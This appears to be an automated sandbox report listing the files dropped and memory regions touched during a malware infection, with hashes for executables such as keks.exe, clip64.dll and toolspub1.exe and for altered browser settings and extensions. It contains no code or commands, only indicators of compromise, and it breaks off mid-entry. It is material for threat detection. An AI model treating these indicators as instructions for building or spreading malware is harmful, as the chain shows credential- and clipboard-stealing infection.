memory/236-69-0x000001E637C60000-0x000001E637CD6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e4cyxzo4.bj3.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\1000148001\alexxxxxxxx.exe

MD5 31841361be1f3dc6c2ce7756b490bf0f
SHA1 ff2506641a401ac999f5870769f50b7326f7e4eb
SHA256 222393a4ab4b2ae83ca861faee6df02ac274b2f2ca0bed8db1783dd61f2f37ee
SHA512 53d66fa19e8db360042dadc55caaa9a1ca30a9d825e23ed2a58f32834691eb2aaaa27a4471e3fc4d13e201accc43160436ed0e9939df1cc227a62a09a2ae0019

memory/60-103-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/2528-105-0x0000000000400000-0x0000000000592000-memory.dmp

memory/236-133-0x000001E637C50000-0x000001E637C5A000-memory.dmp

memory/236-120-0x000001E638120000-0x000001E638132000-memory.dmp

C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe

MD5 20ae0bb07ba77cb3748aa63b6eb51afb
SHA1 87c468dc8f3d90a63833d36e4c900fa88d505c6d
SHA256 daf6ae706fc78595f0d386817a0f8a3a7eb4ec8613219382b1cbaa7089418e7d
SHA512 db315e00ce2b2d5a05cb69541ee45aade4332e424c4955a79d2b7261ab7bd739f02dc688224f031a7a030c92fa915d029538e236dbd3c28b8d07d1265a52e5b2

C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe

MD5 0c582da789c91878ab2f1b12d7461496
SHA1 238bd2408f484dd13113889792d6e46d6b41c5ba
SHA256 a6ab532816fbb0c9664c708746db35287aaa85cbb417bef2eafcd9f5eaf7cf67
SHA512 a1b7c5c13462a7704ea2aea5025d1cb16ddd622fe1e2de3bbe08337c271a4dc8b9be2eae58a4896a7df3ad44823675384dbc60bdc737c54b173909be7a0a086a

memory/4956-149-0x0000000000BC0000-0x0000000000C12000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000149001\gold.exe

MD5 b22521fb370921bb5d69bf8deecce59e
SHA1 3d4486b206e8aaac14a3cf201c5ac152a2a7d4ea
SHA256 b30d10e292f89f4d288839974f71f6b703d6d9a9ae698ea172a2b64364e77158
SHA512 1f7d64ba5266314ed18f577f0984706c21f4f48e8cdb069130e4435c2bcdf219f8dd27e4d3bf3a373f4db4c01e30efe8d7f4d87f4d8cbbbeaf9c7043f685994c

memory/4956-160-0x00000000054E0000-0x0000000005572000-memory.dmp

memory/4956-159-0x0000000005940000-0x0000000005E3E000-memory.dmp

memory/4956-165-0x0000000005490000-0x000000000549A000-memory.dmp

memory/1440-167-0x0000000000400000-0x000000000044E000-memory.dmp

memory/2256-169-0x00000000004D0000-0x0000000000590000-memory.dmp

memory/1440-168-0x0000000000400000-0x000000000044E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpA19A.tmp

MD5 1420d30f964eac2c85b2ccfe968eebce
SHA1 bdf9a6876578a3e38079c4f8cf5d6c79687ad750
SHA256 f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9
SHA512 6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

memory/4956-186-0x0000000005FC0000-0x0000000006036000-memory.dmp

memory/4956-196-0x00000000068D0000-0x00000000068EE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe

MD5 0099a99f5ffb3c3ae78af0084136fab3
SHA1 0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512 5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

memory/4956-203-0x0000000006B70000-0x0000000006C7A000-memory.dmp

memory/4956-204-0x0000000006AA0000-0x0000000006AB2000-memory.dmp

memory/4956-202-0x0000000007000000-0x0000000007606000-memory.dmp

memory/4956-205-0x0000000006B00000-0x0000000006B3E000-memory.dmp

memory/4956-206-0x0000000006C80000-0x0000000006CCB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000152001\jok.exe

MD5 8510bcf5bc264c70180abe78298e4d5b
SHA1 2c3a2a85d129b0d750ed146d1d4e4d6274623e28
SHA256 096220045877e456edfea1adcd5bf1efd332665ef073c6d1e9474c84ca5433f6
SHA512 5ff0a47f9e14e22fc76d41910b2986605376605913173d8ad83d29d85eb79b679459e2723a6ad17bc3c3b8c9b359e2be7348ee1c21fa2e8ceb7cc9220515258d

memory/4924-220-0x0000000000190000-0x00000000001E2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000228001\ISetup8.exe

MD5 6052e1454a5de1e29a430ae6d16bb52b
SHA1 8da24ad974223535909513fac498b34aa7330a26
SHA256 a398d22debd05ac09ea06a19163f0f639d6a847f4a26bc997cf81f2715b02cb4
SHA512 e48db7786e6c8dbe614dc06b5e716ffb8c2e0eefd7ad281fc2d1c98f895989c2cabef23f77b4d216dd36e11d567b8924e8934531e53cbc34a0ac72c654a9e8ea

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1739856679-3467441365-73334005-1000\76b53b3ec448f7ccdda2063b15d2bfc3_3a91fb52-85bd-4fd9-93d9-193086ba0f77

MD5 c40c955855c0c1a1a09a12cea5df5bc4
SHA1 3742927323a102b04c3977f8dff2aa698d4e29be
SHA256 1105c66712b0408d0da5428ff4e4b88a6b55f714a050e41cd05b6be780bddb79
SHA512 a12cce5b8be192654ed5d80ac0cb5c86515e9fa989c5ce97f57b7372b128243dfabd9d6a9401f483e383150dd5946d1c5a4492f352c785cfd3008b908983d58b

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 b4d2b001ac365d3d3b5401d00a1b6452
SHA1 e13a70401fe5a978e3b32209f2f25bec4b75ddeb
SHA256 c8e183f3656b9c86f7eb6e754188b6132db272d4988283a4a923d7b420275d7b
SHA512 3e4f5e5d3b71f4d4780a9ef493f08627b9d75753a95d8278bb9324bfdb5f22fb26c4b986326e6e928ef0f54ee95582824deee20553570b0990ac27d513b1d05e

C:\Users\Admin\AppData\Local\Temp\1000153001\swiiii.exe

MD5 586f7fecacd49adab650fae36e2db994
SHA1 35d9fb512a8161ce867812633f0a43b042f9a5e6
SHA256 cf88d499c83da613ad5ccd8805822901bdc3a12eb9b15804aeff8c53dc05fc4e
SHA512 a44a2c99d18509681505cf70a251baf2558030a8648d9c621acc72fafcb2f744e3ef664dfd0229baf7c78fb72e69f5d644c755ded4060dcafa7f711d70e94772

C:\Users\Admin\AppData\Local\Temp\1000229001\toolspub1.exe

MD5 df469e0a98c5be3dbbdee404268d491a
SHA1 17951c7c3b3dbb7769efa595298ac0183e000c77
SHA256 a48d767621acecbb12a31fbd4007a16e77e6a0155d255c056f2400d0b17cfeba
SHA512 8c90c9e5b57a854b38600946659d39519a222d5cc36008ef9617df74719e662d66445ca223cff7feffabbb50ecad6028d06d436c5d8fdb349b6bf9ddd1128dfc

memory/8-280-0x0000000000850000-0x000000000087E000-memory.dmp

memory/60-282-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/4196-286-0x0000000000400000-0x000000000063B000-memory.dmp

memory/4196-284-0x0000000000400000-0x000000000063B000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe

MD5 1f7fe7cc5b68e5bc6ae32bb490111307
SHA1 7eaa08bc7ccf48a00f97738dfaee69209a9f8105
SHA256 09ed1fc2dc304b8f74bbdc8538afefdce6ccde9ddf9106aa0602e80b573bc269
SHA512 d4f8994a40529b70c5c261b7a9fcb5cf83678282d44590e86df60787e21ff6faad2c525d41fdd192066c7a20c5ac27751185fb65debced0d8e527a9fba4f99c2

memory/2256-317-0x000000001D630000-0x000000001D73A000-memory.dmp

memory/2256-320-0x000000001D560000-0x000000001D59E000-memory.dmp

memory/2256-319-0x000000001C160000-0x000000001C172000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000230001\4767d2e713f2021e8fe856e3ea638b58.exe

MD5 5ffd6a24ead4bce20b16c59b4f897807
SHA1 6c87f3e20a3eae3a7bb847525ed0ba77dc0f9e80
SHA256 108ab0984bdf365e708df3ac3a9e6f6607d6da4ce925f8a180f7a8ed3a1156ca
SHA512 79642408ec9c5378b641a48e551362a45c53426f20e209e434e856fcd4a17850f843a43b183e33d8933821b8031f4ebcfe55b5663730f163875b0c2b5d719da2

memory/4956-331-0x0000000006DB0000-0x0000000006E16000-memory.dmp

memory/3312-336-0x000001CA49B60000-0x000001CA49E2E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 dfbc5eb9362c3d9a4573298347b7ac4e
SHA1 727b36179c6c93b4be16bc64a570ed172d6c895c
SHA256 23b3cc1a0d0ff9cb1ea5a310bf6ee584e0f8ec4cb3212f8688d8ffadfcdfa8ad
SHA512 a79dca16bb716554af1fab37dc236018efa50002a87070ad6aef939ffbd29690ac7ac9567c80f534f945b5b4a32e09c2e27c57d726aa424e96a276299629d95d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 a7745cbb566c998321f31006901ef5a8
SHA1 88c32567cebf6adb46cad4f703e38b9faf883e7f
SHA256 74d05b10effcfa16da7e8b9c960089aba0441b43353e1590053fb01d223bec70
SHA512 0b4e4f3dc1f5fe4b9d2d44a16bb97ce2e8060790d6b3395186b6260255464d5d9f235f3e5c85a3fd3a33315aee7607e0672ab1393c70c96bead748d1e850cece

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 a3a0f41291c7c3049bff328105f7b631
SHA1 7f962cd4bc3b757191ba789d4ae59bf115e4ce5f
SHA256 315579e56d6f44945f82774859fd88a786494a1b1d674a7bab6cec6bc66c4abd
SHA512 70985fd995b7ae6f5d27f0eedc4e010babc1db0b62696325443724f69a8fb7fdb763c2e4bf9ec4117a9b1e87fbba84f2df6093bc22ed1149dbdd2bd0b6b1cce3

C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe

MD5 17eefbaaa30123fa3091add80026aed4
SHA1 8e43d736ea03bd33de5434bda5e20aae121cd218
SHA256 b780f8659c3cfab33ffa95b25b396b2b8ade8bd40c72aaf7c87ad3c6b6cf34c5
SHA512 e82fbbbfef61773fae1ed3e0767efa225ede0327ca5654de25e86359f4366942f85cf5542e67a52b24bb129d7fccf09fc68c64a73cf9269a75040d888005fa09

memory/4920-357-0x00000000005D0000-0x00000000005E2000-memory.dmp

memory/60-358-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/2256-359-0x000000001D3E0000-0x000000001D3FE000-memory.dmp

memory/3312-361-0x000001CA4A1F0000-0x000001CA4A24E000-memory.dmp

memory/3312-360-0x000001CA64400000-0x000001CA646CE000-memory.dmp

memory/2256-363-0x000000001EB40000-0x000000001F066000-memory.dmp

memory/2256-362-0x000000001DF10000-0x000000001E0D2000-memory.dmp

memory/1820-365-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 94855049590df2a11123e4b4dfb202a0
SHA1 60934db6289c32668291284f4024608874fc4901
SHA256 6a050ffa045a5aa2214f5452b3a580e33c0d488eeec2cffd76cf5a656ede0e2a
SHA512 7c6e93423e2fab8e3536add6b3d5df552541afbb0a95d6fb8f1c5f4f7882ea549a84ef00cd66f4c5765bdb80d36749db165e64456d8059e1c7368185d6b5579e

C:\Users\Admin\Pictures\nlSjtJ2dRgOvfrmw5l6z3ZGu.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\sAelCBqfqmajhvZlFuHhOhBV.exe

MD5 ed95a84c31c965f436ae8ccaa9712fd9
SHA1 d4dfe32aaf0e1f1d0d63107f13eaf29a40d38ea1
SHA256 f069178921c8a21f98bd6a1011e7943fa49e067c7112506f4c90036b82862d3e
SHA512 092ee5d1616fcd7787af91984fee4b67ce2625d8ae6eb621b9c39d59d6a42bc88a9550ccf42920514cd9b342aef36a09a8efd04c32dbaa05df5a18e5af6c7b20

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d13721ba3a44cc6150599a4796fe8fb3
SHA1 1081731206b128f0c03f747096b3522e1ad8bcdc
SHA256 264d5e801c3e8ec949f5fba4a398674a015ac007e8b68537e7816c24d4360acb
SHA512 1ab290e0d918a501c5ebbfbc8dd0dc3388612d715659bf40797c8c847f43437ac6190e23b1012b5ca4f7d70152d757568522705c441ef78ed9e4a06a075ca938

C:\Users\Admin\Pictures\inpZ2sy6FtPiN3iFVSNmtl9m.exe

MD5 58b16212fa3ab0e2ce0023281de545b4
SHA1 ac518dd7462645bb06883deb2707071e60a29d4c
SHA256 4f5a627eae64835bbc1e4c6310795d56a60052dc0e5192994adcdbe6a57f0285
SHA512 991d011a30cb024b8016405014b5e1f75a02b870e0651929c3f2bd3108f68490bc3130388c0c2f3f7519579556dcef7b09ce3cdaca008cefb49e96f7ed3207a3

memory/60-469-0x0000000000D80000-0x0000000001246000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 37d618395f06af8d02b265af41f894e8
SHA1 ed4dd6daa1d2a64eddcbd36c3a02af8f33b89b68
SHA256 43ce1c3bc5820a24917fe3f7c2cde6f7cf82b181b7bf1aab13aacb9366b343d0
SHA512 44f6322003ccd8f9c20596cebc8886a1cf69d907ff4c153c90e905b5a5c9c9650c6487f1c0812d4a27a9668bb158bca780a264e8aa9e6e9b6615d326b9b756a1

memory/4956-480-0x0000000007810000-0x0000000007860000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 38deb02fcd07b78d63c1259494053067
SHA1 87570398e789afbc0b46f6500abae5d9804ba6db
SHA256 06b4824728d97dea62f8b1c2984d1ecbd6d943f2d616de974be330349a8f61a3
SHA512 03758a1da68495d851cf1d8455d50685a2a947c5ef9b040ebbd6a8802e6c419a98e48048d6fd45f42d38a261128642332c96d7940941b3a2c7c2bdd1cd5c043f

C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe

MD5 24dd75b0a7bb9a0e0918ee0dd84a581a
SHA1 de796b237488df3d26a99aa8a78098c010aeb2c9
SHA256 878966291372a9633242af15570a8bbe31699b5e0b650e806af4742da1f6b35d
SHA512 53f951d795fbf760dd593619bb3f96fd604bc15adb4f637457d28fbd78ae3764afd4e9c9a755a6241431ad4664dd30e4a2df84e33fe59954f7c55da0e4038557

C:\Users\Public\Desktop\Google Chrome.lnk

MD5 3b0741b38a45c00269d6ab84474b9595
SHA1 73d1a2755d17b2667284eb873838b4dd71ecf1ad
SHA256 1d9fb34151bd26533df32a1fceba4884e92a7502efc23b7d3b985886f452696f
SHA512 25b6357ca89ddca3a8ec4db1e6940749fe027aa0412afeb32fd371b0b5c51f1d6e1bec1b8e3268d9f898e83f97b3acbac68382725a27d37c4fbb287969de6011

C:\Users\Admin\Pictures\lMASrt8bdzeJuUab8VNu9cph.exe

MD5 33516d0e679e52b2cbc19d4605dd13dd
SHA1 61091c1f4021bf2cac9ed5d7f71c89c5ba4365eb
SHA256 907d5e0d2ec89e150488e5e5054cadc65e91639993656b5c0f6851eab7624f83
SHA512 e5025bedd21011387220348be70a95d3ed0f52f99b5ae62744980f6cca4b36b663ce8ee2db1c11b6b31835fc68bb95fb0ffff9f2501e3526102255c3d177086d

\Users\Admin\AppData\Local\Temp\Opera_installer_2404291236507265704.dll

MD5 45fe60d943ad11601067bc2840cc01be
SHA1 911d70a6aad7c10b52789c0312c5528556a2d609
SHA256 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add
SHA512 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba

memory/60-631-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/6056-637-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\Pictures\YGgfgwIPo3gCV8lAaP7rqeVW.exe

MD5 e13e77e4db785816f7a4e6ab6a0242d6
SHA1 3384dd77791dd538b7c74a9b7a1eb08b255ec303
SHA256 d709b851b77aa0be36e457273efcefdb710c7d62e95191c930411d1c2dec5edb
SHA512 4087532917db0573a931f5ddb783241ab7af42216a4a7528b37ad3b2bc7d2dd9cfc1459acba7629b0349d74f8475bb8423d2b18046038df78b24515d05c5d058

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

memory/5532-668-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/5532-682-0x0000000010000000-0x00000000105E1000-memory.dmp

memory/5228-687-0x0000000004770000-0x00000000047A6000-memory.dmp

memory/5228-688-0x0000000006E50000-0x0000000007478000-memory.dmp

memory/60-689-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5788-690-0x0000000000400000-0x00000000005C4000-memory.dmp

memory/6056-691-0x0000000140000000-0x0000000140786000-memory.dmp

memory/5228-693-0x0000000007580000-0x00000000075E6000-memory.dmp

memory/5228-692-0x00000000074E0000-0x0000000007502000-memory.dmp

memory/5228-694-0x0000000007660000-0x00000000079B0000-memory.dmp

memory/5228-696-0x0000000006AB0000-0x0000000006ACC000-memory.dmp

memory/60-707-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5828-710-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/5788-711-0x0000000000840000-0x0000000000891000-memory.dmp

memory/5828-731-0x0000000010000000-0x00000000105E1000-memory.dmp

memory/5748-741-0x0000000008BE0000-0x0000000008BFA000-memory.dmp

memory/60-742-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5788-744-0x0000000000400000-0x00000000005C4000-memory.dmp

memory/5748-743-0x0000000008C30000-0x0000000008C52000-memory.dmp

memory/5748-740-0x0000000008E90000-0x0000000008F24000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\opera_package

MD5 b7e7c07657383452919ee39c5b975ae8
SHA1 2a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA256 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512 daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39

memory/4924-801-0x0000000007BF0000-0x0000000007DB2000-memory.dmp

memory/4924-804-0x00000000082F0000-0x000000000881C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291236511\additional_file0.tmp

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

memory/60-864-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/60-920-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/4920-945-0x0000000000C70000-0x0000000000C8E000-memory.dmp

memory/4920-946-0x000000001C140000-0x000000001C1E2000-memory.dmp

memory/4920-947-0x000000001C1E0000-0x000000001C200000-memory.dmp

memory/4920-949-0x000000001F750000-0x000000001FAA0000-memory.dmp

memory/60-950-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5532-952-0x0000000000860000-0x0000000000ED4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpE4A.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmpEBE.tmp

MD5 11e95c7fb95cdd988d010f07beed00a2
SHA1 42e5102616a5dc275a527f43712c8abb51257903
SHA256 5220792586097ec80cfc56e40f6a45e66cc64011dce59218de14036c2e03ef84
SHA512 9337e8b523ad86ad74598e1d392ec4768500031b22f1e21a52bb7c9670d102e20a4c09dfd6718dd4a650e70f043b596709abd43092f5f822ba3fe15607f44cab

C:\Users\Admin\AppData\Local\Temp\tmpF47.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

memory/4752-1047-0x00000000000A0000-0x0000000000714000-memory.dmp

memory/5828-1046-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/5200-1050-0x0000000006140000-0x0000000006490000-memory.dmp

memory/5200-1051-0x0000000006650000-0x000000000669B000-memory.dmp

memory/4920-1067-0x000000001D090000-0x000000001D0A4000-memory.dmp

memory/60-1074-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5400-1075-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/2216-1078-0x00000000072A0000-0x00000000072EB000-memory.dmp

memory/4752-1087-0x0000000010000000-0x00000000105E1000-memory.dmp

memory/4752-1104-0x0000000002A50000-0x0000000002AD5000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 88e74721a79708e4c91b18c6ea6e6d54
SHA1 2d975c6e5ad89ad9a57b4efd406ea675320f1e35
SHA256 5e16b53f1c199a3d0d299c15bd3b4109e1dfd5ec7466dfa6e1499da7c053a300
SHA512 6b834879b83fd9eb8f04a85850812b24655fa25eb269e021a2bd5102bd33a30cef8770d477f529f52fa3423538f1a6b5433b42ed30eb1146a543869c973c95d0

memory/5400-1164-0x0000000010000000-0x00000000105E1000-memory.dmp

memory/4752-1167-0x00000000031A0000-0x0000000003203000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\rlKiGEB.exe

MD5 90487eb500021dbcb9443a2cf972a204
SHA1 62ae31665d462c8e5d6632f389b1e94afb9bf00d
SHA256 4a86ca84b985a5228eccd13f225bb403e9574e7f64b900a9acc4d32bcb732ff2
SHA512 8cb3b1ae44246bee8bf2b81220d7a5782c4e82b2b871a81bdc9ea170fbe477d7be59c3543554f2cdefde7422bcc88b6624b966dff1603c79d277329fb2074d17

memory/60-1330-0x0000000000D80000-0x0000000001246000-memory.dmp

memory/5292-1352-0x0000000001310000-0x0000000001984000-memory.dmp

memory/5400-1353-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/4752-1387-0x0000000003980000-0x0000000003A07000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 e0b9c4ba3b3c9232f8204cd7c9f8b789
SHA1 d00c5d8e0f2c469d6a85f108275dd18d3918e75c
SHA256 28cabf0190e13f9a1f5662f11bb0c447fabe773805a6fa17f524db0bdc85b9a3
SHA512 8550bc55a8ce39ea5806ff108a24d54f1bc72f5587d0d86c062aad5b4c76858e803f080e50615d1072f0a08f80c222efe0a57424cec50379c2d442167ae06a7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\41eh5pdr.default-release\prefs.js

MD5 13b94af1031712ecdc3112deb2f26cda
SHA1 f0a7c65bc38d951016cf1368f5e180535231ecd1
SHA256 7d2ed1fcfaf5153e2430f9260b7874182a2e62744cc566a45c0db8e31ba9648a
SHA512 319b46d8822b96f4a082c6a812e2362686ae955ec5f2247e08b0197ff76a2f1ddaee7922a401be86762b429f3cd88305da7698595f6663de6d1f7831999e8df5

memory/4752-1399-0x0000000003AF0000-0x0000000003BC8000-memory.dmp

memory/5792-1397-0x00000000037A0000-0x0000000003D81000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 d4b32715d583a8f2c5004470d9f5afa8
SHA1 972cdd3ec74d1130921752ee8a81da8b647edc92
SHA256 8ebba729f1c0b6027eda43bac9e6a6ae5dd379293de2d433c6e85cddcfc18178
SHA512 fbfa38492628d598af30375dfc8161c5d3a972d0744bf341b6d543f8140c9ea8289eb13c5618204b4fd9a587011cdad6ea1b7c6b5ee133e2641e0e4c482774b6

memory/5532-1443-0x0000000000860000-0x0000000000ED4000-memory.dmp

memory/4752-1465-0x00000000000A0000-0x0000000000714000-memory.dmp

memory/5840-1475-0x00000000076D0000-0x000000000771B000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 2fde957e44f1378693c59aea68d533cc
SHA1 b91b115c7505caab931b72ef523555cb898c4116
